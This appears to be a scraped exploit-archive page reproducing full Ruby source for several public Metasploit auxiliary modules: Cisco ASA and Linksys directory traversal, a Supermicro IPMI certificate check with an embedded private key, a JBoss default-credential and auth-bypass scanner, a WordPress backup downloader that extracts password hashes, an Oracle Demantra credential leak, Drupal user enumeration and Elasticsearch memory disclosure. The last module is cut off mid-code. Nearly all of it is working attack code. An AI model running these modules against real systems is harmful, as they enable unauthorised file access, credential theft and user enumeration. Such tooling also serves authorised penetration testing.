This Metasploit module exploits a directory traversal vulnerability in Ciscos Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Ciscos VPN web service which includes directories, files, and currently logged in users.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Cisco ASA Directory Traversal',      'Description'    => %q{        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.        It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.      },      'Author'         => [ 'Michał Bentkowski',  # Discovery                            'Yassine Aboukir',    # PoC                            'Shelby Pace'         # Metasploit Module                          ],      'License'        => MSF_LICENSE,      'References'     => [                           [ 'CVE', '2018-0296' ],                           [ 'EDB', '44956' ]                          ],      'DisclosureDate' => '2018-06-06'    ))    register_options(      [        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),        OptBool.new('SSL', [ true, 'Use SSL', true ]),        Opt::RPORT(443)      ])  end  def is_accessible?    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')    res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))  end  def list_files(path)    uri = normalize_uri(target_uri.path, path)    list_res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    if list_res && list_res.code == 200      if list_res.body.match(/\/{3}sessions/)        get_sessions(list_res.body)      else        print_good(list_res.body)      end    end  end  def get_sessions(response)    session_nos = response.scan(/([0-9]{2,})/)    if session_nos.empty?      print_status("Could not detect any sessions")      print("\n")      return    end    print_good(response)    list_users(session_nos)  end  def list_users(sessions)    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    user_ids = Array.new    sessions.each do |session_no|      users_res = send_request_cgi(        'method'  =>  'GET',        'uri'     =>  normalize_uri(target_uri.path, sessions_uri, session_no)      )      if users_res && users_res.body.include?('name')        user_ids.push(users_res.body.match(/user:(\w+)/).to_s)      end    end    unless user_ids.empty?      print_status('Users logged in:')      user_ids.each { |id| print_good(id) }      print("\n")      return    end    print_status("There are no users logged in currently")  end  def run    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'    paths = [file_uri, sessions_uri, cscoe_uri]    unless is_accessible?      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')    end    paths.each { |path| list_files(path) }  endend

Cisco ASA Directory Traversal

This Metasploit module checks for a static SSL certificate shipped with Supermicro Onboard IPMI controllers. An attacker with access to the publicly-available firmware can perform man-in-the-middle attacks and offline decryption of communication to the controller. This Metasploit module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware version SMT_X9_214.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  PRIVATE_KEY = <<-EOF.gsub(/^ {4}/, '')    -----BEGIN RSA PRIVATE KEY-----    MIICXQIBAAKBgQC1q1kR6chWLfwspD84Asyy6EFV6SYRGy/gILsYGtn9kCQi2RFo    bNxS5CvphbGWn9D9n5gJpTVWLWb3LwJxGuBKSRj2wrHLlejzw6kSmF+3xFCuMfxV    FSj8TM8JqlOqM1c6lvH2MSXnN7pJBVcekNKbBUEfptakPSejStljbXecSwIDAQAB    AoGAah4/FzGiboTKCyGeNA+eltsIXzCjpdZlrtwvrbLxpyXtldWKT59XS6ww4mXQ    CJYuNBhnbSrt7vrybG0vVfZHEOCvK+5YKBOtvRgrWDgs1Bkc5hsdI5gLx3jE7g6M    PuUvD7ueF4OzYeYRrOLWr957jl32n+hD/k65bKWAUp3aTDECQQDqnEPZWlmoH7Jp    6woRnEp+1cullHv8DviM5Huh+JeBotSa03p4unhKlRYSqnHdeHU2343n1VUDzvnV    LQWi5G+FAkEAxjt0S67lyuuVD842uZRHt2WSQvwt23aKzQ+EJwV0IXYzfefeLzEm    dDdvc1AJ31gweAQK89/5/1EEF40K7BJdjwJBAJDFdtTT/QlS7eyQPjlZwVp9IVp+    wvdqYZPHlkb/uLYlPZ6Aq01+e6ZCU0mXZgYtQ99lmhKaQQjFmsMiMh0va2UCQA2T    NLuaFpJ235ZdgNHknaSpiAKeUmWdEJRKY7poXTONbKlKn6SLsR50TWWQLZzl5SvS    2w0oYW5ile0m84CHIXECQQCrABn0HY4Ll9/4FX+OCWamqwENltU1GcGIogeyFymK    ZVX8QdAVoUiZoUaVku946j63WNSkI1sU/UWhL6XDt4gx    -----END RSA PRIVATE KEY-----  EOF  def initialize    super(      'Name'        => 'Supermicro Onboard IPMI Static SSL Certificate Scanner',      'Description' => %q{        This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI        controllers. An attacker with access to the publicly-available firmware can perform        man-in-the-middle attacks and offline decryption of communication to the controller.        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware        version SMT_X9_214.      },      'Author'       =>        [          'hdm', # Discovery and analysis          'juan' # Metasploit module        ],      'License'     => MSF_LICENSE,      'References'  =>        [          [ 'CVE', '2013-3619' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/']        ],      'DisclosureDate' => 'Nov 06 2013'    )    register_options(      [        Opt::RPORT(443),      ])  end  # Fingerprint a single host  def run_host(ip)    connect(true, {"SSL" => true}) #Force SSL    cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)    disconnect    unless cert      vprint_error("#{ip}:#{rport} - No certificate found")      return    end    pkey = OpenSSL::PKey::RSA.new(PRIVATE_KEY)    result = cert.verify(pkey)    if result      print_good("#{ip}:#{rport} - Vulnerable to CVE-2013-3619 (Static SSL Certificate)")      # Report with the SSL Private Key hash for the host      digest = OpenSSL::Digest::SHA1.new(pkey.public_key.to_der).to_s.scan(/../).join(":")      report_note(        :host  => ip,        :proto => 'tcp',        :port  => rport,        :type  => 'supermicro.ipmi.ssl.certificate.pkey_hash',        :data  => digest      )      report_vuln({        :host  => rhost,        :port  => rport,        :proto => 'tcp',        :name  => "Supermicro Onboard IPMI Static SSL Certificate",        :refs  => self.references      })    end  endend

Supermicro Onboard IPMI Static SSL Certificate Scanner

This Metasploit module exploits a directory traversal vulnerability which is present in different Linksys home routers, like the E1500.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Linksys E1500 Directory Traversal Vulnerability',      'Description' => %q{          This module exploits a directory traversal vulnerability which is present in        different Linksys home routers, like the E1500.      },      'References'  =>        [          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],          [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ],          [ 'BID', '57760' ],          [ 'OSVDB', '89911' ],          [ 'EDB', '24475' ]        ],      'Author'      => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],      'License'     => MSF_LICENSE    )    register_options(      [        OptPath.new('SENSITIVE_FILES',  [ true, "File containing sensitive files, one per line",          File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),        OptString.new('HttpUsername',[ true, 'User to login with', 'admin']),        OptString.new('HttpPassword',[ true, 'Password to login with', 'password']),      ])  end  def extract_words(wordfile)    return [] unless wordfile && File.readable?(wordfile)    begin      File.readlines(wordfile, chomp: true)    rescue ::StandardError => e      elog(e)      []    end  end  def find_files(file,user,pass)    uri = "/apply.cgi"    traversal = '../..'    data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file    res = send_request_cgi({      'method'  => 'POST',      'uri'     => uri,      'authorization' => basic_auth(user,pass),      'vars_post' => {        "submit_type" => "wsc_method2",        "change_action" => "gozila_cgi",        "next_page" => traversal << file      }    })    # without res.body.length we get lots of false positives    if (res and res.code == 200 and res.body.length > 0)      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")      report_web_vuln({          :host => rhost,          :port => rport,          :vhost => datastore['VHOST'],          :path => uri,          :pname => data_trav,          :risk => 3,          :proof => data_trav,          :name => self.fullname,          :category => "web",          :method => "POST"      })      loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file)      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")    elsif (res and res.code)      vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")    end  end  def run_host(ip)    user = datastore['HttpUsername']    pass = datastore['HttpPassword']    vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")    # test login    begin      res = send_request_cgi({        'uri' => '/',        'method' => 'GET',        'authorization' => basic_auth(user,pass)      })      return if res.nil?      return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/)      return if (res.code == 404)      if [200, 301, 302].include?(res.code)        vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")      else        vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")        return      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    extract_words(datastore['SENSITIVE_FILES']).each do |file|      find_files(file, user, pass) unless file.empty?    end  endend

Linksys E1500 Directory Traversal

This Metasploit module scans a JBoss instance for a few vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'                  => 'JBoss Vulnerability Scanner',      'Description'           => %q(        This module scans a JBoss instance for a few vulnerabilities.      ),      'Author'                =>        [          'Tyler Krpata',          'Zach Grace <@ztgrace>'        ],      'References'            =>        [          [ 'CVE', '2008-3273' ], # info disclosure via unauthenticated access to "/status"          [ 'CVE', '2010-1429' ], # info disclosure via unauthenticated access to "/status" (regression)          [ 'CVE', '2010-0738' ], # VERB auth bypass on "JMX-Console": /jmx-console/          [ 'CVE', '2010-1428' ], # VERB auth bypass on "Web Console": /web-console/          [ 'CVE', '2017-12149' ] # deserialization: "/invoker/readonly"        ],      'License'               => BSD_LICENSE      ))    register_options(      [        OptString.new('VERB',  [ true,  "Verb for auth bypass testing", "HEAD"])      ])  end  def run_host(ip)    res = send_request_cgi(      {        'uri'       => "/" + Rex::Text.rand_text_alpha(12),        'method'    => 'GET',        'ctype'     => 'text/plain'      })    if res      info = http_fingerprint(:response => res)      print_status("#{rhost}:#{rport} Fingerprint: #{info}")      if res.body && />(JBoss[^<]+)/.match(res.body)        print_error("#{rhost}:#{rport} JBoss error message: #{$1}")      end      apps = [        '/jmx-console/HtmlAdaptor',        '/jmx-console/checkJNDI.jsp',        '/status',        '/web-console/ServerInfo.jsp',        # apps added per Patrick Hof        '/web-console/Invoker',        '/invoker/JMXInvokerServlet',        '/invoker/readonly'      ]      print_status("#{rhost}:#{rport} Checking http...")      apps.each do |app|        check_app(app)      end      jboss_as_default_creds      ports = {        # 1098i, 1099, and 4444 needed to use twiddle        1098 => 'Naming Service',        1099 => 'Naming Service',        4444 => 'RMI invoker'      }      print_status("#{rhost}:#{rport} Checking services...")      ports.each do |port, service|        status = test_connection(ip, port) == :up ? "open" : "closed"        print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")      end    end  end  def check_app(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain'    })    unless res      print_status("#{rhost}:#{rport} #{app} not found")      return    end    case    when res.code == 200      print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")    when res.code == 403      print_status("#{rhost}:#{rport} #{app} restricted (403)")    when res.code == 401      print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")      bypass_auth(app)      basic_auth_default_creds(app)    when res.code == 404      print_status("#{rhost}:#{rport} #{app} not found (404)")    when res.code == 301, res.code == 302      print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")    when res.code == 500 && app == "/invoker/readonly"      print_good("#{rhost}:#{rport} #{app} responded (#{res.code})")    else      print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")    end  end  def jboss_as_default_creds    print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")    session = jboss_as_session_setup(rhost, rport)    return false if session.nil?    # Default AS creds    username = 'admin'    password = 'admin'    res = send_request_raw({      'uri'      => '/admin-console/login.seam',      'method'   => 'POST',      'version'  => '1.1',      'vhost'    => "#{rhost}",      'headers'  => { 'Content-Type'  => 'application/x-www-form-urlencoded',                      'Cookie'        => "JSESSIONID=#{session['jsessionid']}"                    },      'data'     => "login_form=login_form&login_form%3Aname=#{username}&login_form%3Apassword=#{password}&login_form%3Asubmit=Login&javax.faces.ViewState=#{session["viewstate"]}"    })    # Valid creds if 302 redirected to summary.seam and not error.seam    if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m      print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")      add_creds(username, password)    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  def add_creds(username, password)    service_data = {      address: rhost,      port: rport,      service_name: 'jboss',      protocol: 'tcp',      workspace_id: framework.db.workspace.id    }    credential_data = {      module_fullname: self.fullname,      origin_type: :service,      private_data: password,      private_type: :password,      username: username    }.merge(service_data)    credential_core = create_credential(credential_data)    credential_data[:core] = credential_core    create_credential_login(credential_data)  end  def jboss_as_session_setup(rhost, rport)    res = send_request_raw({      'uri'       => '/admin-console/login.seam',      'method'    => 'GET',      'version'   => '1.1',      'vhost'     => "#{rhost}"    })    unless res      return nil    end    begin      viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]      jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]    rescue ::NoMethodError      print_status("#{rhost}:#{rport} Could not guess admin credentials")      return nil    end    { 'jsessionid' => jsessionid, 'viewstate' => viewstate }  end  def bypass_auth(app)    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")    res = send_request_raw({      'uri'       => app,      'method'    => datastore['VERB'],      'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering at #{app}")    else      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")    end  end  def basic_auth_default_creds(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain',      'authorization' => basic_auth('admin', 'admin')    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")      add_creds("admin", "admin")    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  # function stole'd from mssql_ping  def test_connection(ip, port)    begin      sock = Rex::Socket::Tcp.create(        'PeerHost' => ip,        'PeerPort' => port,        'Timeout' => 20      )    rescue Rex::ConnectionError      return :down    end    sock.close    return :up  endend

JBoss Scanner

This Metasploit module exploits an unauthenticated database backup vulnerability in WordPress plugin Boldgrid-Backup also known as Total Upkeep version < 1.14.10. First, env-info.php is read to get server information. Next, restore-info.json is read to retrieve the last backup file. That backup is then downloaded, and any sql files will be parsed looking for the wp_users INSERT statement to grab user creds.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress Total Upkeep Unauthenticated Backup Downloader',        'Description' => %q{          This module exploits an unauthenticated database backup vulnerability in WordPress plugin          'Boldgrid-Backup' also known as 'Total Upkeep' version < 1.14.10.          First, `env-info.php` is read to get server information.  Next, `restore-info.json` is          read to retrieve the last backup file.  That backup is then downloaded, and any sql          files will be parsed looking for the wp_users INSERT statement to grab user creds.        },        'References' => [          ['EDB', '49252'],          ['WPVDB', '10502'],          ['WPVDB', '10503'],          ['URL', 'https://plugins.trac.wordpress.org/changeset/2439376/boldgrid-backup']        ],        'Author' => [          'Wadeek', # Vulnerability discovery          'h00die' # Metasploit module        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => [IOC_IN_LOGS]        },        'DisclosureDate' => '2020-12-12',        'License' => MSF_LICENSE      )    )  end  def run_host(ip)    unless wordpress_and_online?      fail_with Failure::NotVulnerable, "#{ip} - Server not online or not detected as wordpress"    end    checkcode = check_plugin_version_from_readme('boldgrid-backup', '1.14.10')    unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)      fail_with Failure::NotVulnerable, "#{ip} - A vulnerable version of Boldgrid Backup was not found"    end    print_good("#{ip} - Vulnerable version of Boldgrid Backup detected")    print_status("#{ip} - Obtaining Server Info")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'boldgrid-backup', 'cli', 'env-info.php')    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    begin      data = JSON.parse(res.body)    rescue StandardError      fail_with Failure::NotVulnerable, "#{ip} - Unable to parse JSON output.  Check response: #{res.body}"    end    output = []    data.each do |k, v|      output << "  #{k}: #{v}"    end    print_good("#{ip} - \n#{output.join("\n")}")    path = store_loot(      'boldgrid-backup.server.info',      'text/json',      ip,      data,      'env-info.json'    )    print_good("#{ip} - File saved in: #{path}")    print_status("#{ip} - Obtaining Backup List from Cron")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'boldgrid-backup', 'cron', 'restore-info.json')    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - No database backups detected" if res.code == 404    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    begin      data = JSON.parse(res.body)    rescue StandardError      fail_with Failure::NotVulnerable, "#{ip} - Unable to parse JSON output.  Check response: #{res.body}"    end    output = []    data.each do |k, v|      output << "  #{k}: #{v}"    end    print_good("#{ip} - \n#{output.join("\n")}")    path = store_loot(      'boldgrid-backup.backup.info',      'text/json',      ip,      data,      'restore-info.json'    )    print_good("#{ip} - File saved in: #{path}")    unless data['filepath']      print_bad("#{ip} - no file found")    end    # pull a url from the local file system path    path = data['filepath'].sub(data['ABSPATH'], '')    print_status("#{ip} attempting download of #{path}")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, path)    })    fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res    fail_with Failure::NotVulnerable, "#{ip} - Unable to download" if res.code == 404    fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Non 200 code received" if res.code != 200    path = store_loot(      'boldgrid-backup.backup.zip',      'application/zip',      ip,      res.body,      path.split('/').last    )    print_good("#{ip} - Database backup (#{res.body.bytesize} bytes) saved in: #{path}")    Zip::File.open(path) do |zip_file|      # Handle entries one by one      zip_file.each do |entry|        # Extract to file        next unless entry.name.ends_with?('.sql')        print_status("#{ip} - Attempting to pull creds from #{entry}")        f = entry.get_input_stream.read        f.split("\n").each do |l|          next unless l.include?('INSERT INTO `wp_users` VALUES ')          columns = ['user_login', 'user_pass']          table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)          l.split('),(').each do |user|            user = user.split(',')            username = user[1].strip            username = username.start_with?("'") ? username.gsub("'", '') : username            hash = user[2].strip            hash = hash.start_with?("'") ? hash.gsub("'", '') : hash            create_credential({              workspace_id: myworkspace_id,              origin_type: :service,              module_fullname: fullname,              username: username,              private_type: :nonreplayable_hash,              jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),              private_data: hash,              service_name: 'Wordpress',              address: ip,              port: datastore['RPORT'],              protocol: 'tcp',              status: Metasploit::Model::Login::Status::UNTRIED            })            table << [username, hash]          end          print_good(table.to_s)        end      end    end    print_status("#{ip} - finished processing backup zip")  endend

WordPress Total Upkeep Unauthenticated Backup Downloader

This Metasploit module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle Demantra Database Credentials Leak',      'Description'    => %q{        This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in        combination with an authentication bypass. This way an unauthenticated user can retrieve        the database name, username and password on any vulnerable machine.      },      'References'     =>        [          [ 'CVE', '2013-5795'],          [ 'CVE', '2013-5880'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]        ],      'Author'         =>        [          'Oliver Gruskovnjak'        ],      'License'        => MSF_LICENSE,      'DisclosureDate' => '2014-02-28'    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('SSL',   [false, 'Use SSL', false])      ])  end  def run_host(ip)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'),      'vars_get' => {        'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1'      }    })    if res.nil? or res.body.empty?      vprint_error("No content retrieved")      return    end    if res.code == 404      vprint_error("File not found")      return    end    if res.code == 200      creds = ""      vprint_status("String received: #{res.body.to_s}") unless res.body.blank?      res.body.to_s.split(",").each do|c|        i = c.to_i ^ 0x50        creds += i.chr      end      print_good("Credentials decoded: #{creds}") unless creds.empty?    end  endend

Oracle Demantra Database Credentials Leak

This Metasploit module exploits an information disclosure vulnerability in the Views module of Drupal, brute-forcing the first 10 usernames from a to z. Drupal 6 with Views module less than or equal to 6.x-2.11 are vulnerable. Drupal does not consider disclosure of usernames as a weakness.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::WmapScanServer  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'Drupal Views Module Users Enumeration',      'Description'    => %q{        This module exploits an information disclosure vulnerability in the 'Views'        module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'.        Drupal 6 with 'Views' module <= 6.x-2.11 are vulnerable.  Drupal does not        consider disclosure of usernames as a weakness.      },      'Author'         =>        [          'Justin Klein Keane', #Original Discovery          'Robin Francois <rof[at]navixia.com>',          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'        ],      'License'        => MSF_LICENSE,      'References'     =>        [          ['URL', 'http://www.madirish.net/node/465'],          ['URL', 'https://www.drupal.org/node/1004778'],        ],      'DisclosureDate' => '2010-07-02'    ))    register_options(      [        OptString.new('TARGETURI', [true, "Drupal Path", "/"])      ])  end  def base_uri    @base_uri ||= normalize_uri("#{target_uri.path}/?q=admin/views/ajax/autocomplete/user/")  end  def check_host(ip)    res = send_request_cgi(      'uri'     => base_uri,      'method'  => 'GET',      'headers' => { 'Connection' => 'Close' }    )    unless res      return Exploit::CheckCode::Unknown    end    if res.body.include?('Access denied')      # This probably means the Views Module actually isn't installed      print_error("Access denied")      return Exploit::CheckCode::Safe    elsif res.message != 'OK' || res.body != '[  ]'      return Exploit::CheckCode::Safe    else      return Exploit::CheckCode::Appears    end  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: (ssl ? 'https' : 'http'),      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user]    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    # Check if remote host is available or appears vulnerable    unless check_host(ip) == Exploit::CheckCode::Appears      print_error("#{ip} does not appear to be vulnerable, will not continue")      return    end    print_status("Begin enumerating users at #{vhost}")    results = []    ('a'..'z').each do |l|      vprint_status("Iterating on letter: #{l}")      res = send_request_cgi(        'uri'     => "#{base_uri}#{l}",        'method'  => 'GET',        'headers' => { 'Connection' => 'Close' }      )      if res && res.message == 'OK'        begin          user_list = JSON.parse(res.body)        rescue JSON::ParserError => e          elog('Exception encountered parsing JSON response', error: e)          return []        end        if user_list.empty?          vprint_error("Not found with: #{l}")        else          vprint_good("Found: #{user_list}")          results << user_list.flatten.uniq        end      else        print_error("Unexpected results from server")        return      end    end    results = results.flatten.uniq    print_status("Done. #{results.length} usernames found...")    results.each do |user|      print_good("Found User: #{user}")      report_cred(        ip: Rex::Socket.getaddress(datastore['RHOST']),        port: datastore['RPORT'],        user: user,        proof: base_uri      )    end    results = results * "\n"    p = store_loot(      'drupal_user',      'text/plain',      Rex::Socket.getaddress(datastore['RHOST']),      results.to_s,      'drupal_user.txt'    )    print_status("Usernames stored in: #{p}")  endend

Drupal Views Module Users Enumeration

This Metasploit module exploits a memory disclosure vulnerability in Elasticsearch 7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary queries to Elasticsearch can generate an error message containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. This vulnerabilitys output is similar to heartbleed.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  DEDUP_REPEATED_CHARS_THRESHOLD = 400  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Elasticsearch Memory Disclosure',        'Description' => %q{          This module exploits a memory disclosure vulnerability in Elasticsearch          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary          queries to Elasticsearch can generate an error message containing previously          used portions of a data buffer.          This buffer could contain sensitive information such as Elasticsearch          documents or authentication details. This vulnerability's output is similar          to heartbleed.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Eric Howard', # discovery          'R0NY' # edb exploit        ],        'References' => [          ['EDB', '50149'],          ['CVE', '2021-22145'],          ['URL', 'https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177']        ],        'DisclosureDate' => '2021-07-21',        'Actions' => [          ['SCAN', { 'Description' => 'Check hosts for vulnerability' }],          ['DUMP', { 'Description' => 'Dump memory contents to loot' }],        ],        'DefaultAction' => 'SCAN',        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => [] # nothing in the docker logs anyways        }      )    )    register_options(      [        Opt::RPORT(9200),        OptString.new('USERNAME', [ false, 'User to login with', '']),        OptString.new('PASSWORD', [ false, 'Password to login with', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Elastic Application', '/']),        OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])      ]    )  end  def get_version    vprint_status('Querying version information...')    request = {      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?    res = send_request_cgi(request)    return nil if res.nil?    return nil if res.code == 401    if res.code == 200 && !res.body.empty?      json_body = res.get_json_document      if json_body.empty?        vprint_error('Unable to parse JSON')        return      end    end    json_body.dig('version', 'number')  end  def check_host(_ip)    version = get_version    return CheckCode::Unknown("#{peer} - Could not connect to web service, or unexpected response") if version.nil?    if Rex::Version.new(version) <= Rex::Version.new('7.13.3') && Rex::Version.new(version) >= Rex::Version.new('7.10.0')      return Exploit::CheckCode::Appears("Exploitable Version Detected: #{version}")    end    Exploit::CheckCode::Safe("Unexploitable Version Detected: #{version}")  end  def leak_count    datastore['LEAK_COUNT']  end  # Stores received data  def loot_and_report(data)    if data.to_s.empty?      vprint_error("Looks like there isn't leaked information...")      return    end    print_good("Leaked #{data.length} bytes")    report_vuln({      host: rhost,      port: rport,      name: name,      refs: references,      info: "Module #{fullname} successfully leaked info"    })    if action.name == 'DUMP' # Check mode, dump if requested.      path = store_loot(        'elasticsearch.memory.disclosure',        'application/octet-stream',        rhost,        data,        nil,        'Elasticsearch server memory'      )      print_good("Elasticsearch memory data stored in #{path}")    end    # Convert non-printable characters to periods    printable_data = data.gsub(/[^[:print:]]/, '.')    # Keep this many duplicates as padding around the deduplication message    duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round    # Remove duplicate characters    abbreviated_data = 